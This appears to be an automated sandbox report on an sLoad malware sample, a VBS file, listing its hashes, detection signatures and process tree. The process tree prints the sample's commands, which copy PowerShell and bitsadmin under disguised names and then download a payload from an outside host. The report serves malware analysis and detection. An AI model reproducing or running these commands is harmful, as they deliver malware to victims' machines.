Analysis

  • max time kernel
    32s
  • max time network
    110s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    23-11-2020 13:04

General

  • Target

    Allegato_Sload_Italy_vbs (20).vbs

  • Size

    7KB

  • MD5

    764c02c19ff5e5813528991248c34d08

  • SHA1

    d6c3be949a077865c84ae819265bf3a8acf4115f

  • SHA256

    189c235e1d8e1cd2bf2ad530c774a3004872956729b475edd53f0397b81c0806

  • SHA512

    77ab15c84a2472f65ff4966ef57b5ff85732e4c42158ed262a24bf64a874a89581ae16b24959c175230bc0e4933d4bff0f7921190ebfa9ff30a277e2cd8224f9

Score
10/10

Malware Config

Signatures

  • sLoad

    sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Allegato_Sload_Italy_vbs (20).vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:576
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\zdFWsdWA.exe & cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\PXrnMVl*.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2360
      • C:\Windows\system32\cmd.exe
        cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\zdFWsdWA.exe
        3⤵
          PID:3568
        • C:\Windows\system32\cmd.exe
          cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\PXrnMVl*.exe
          3⤵
            PID:3984
        • C:\ProgramData\PXrnMVlin.exe
          "C:\ProgramData\PXrnMVlin.exe" /transfer GxitvS /download https://estebankott.com/ordasum/SNNRRT80M06D205G/map.gif C:\Users\Admin\AppData\Roaming\map.gif
          2⤵
          • Executes dropped EXE
          PID:4036

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads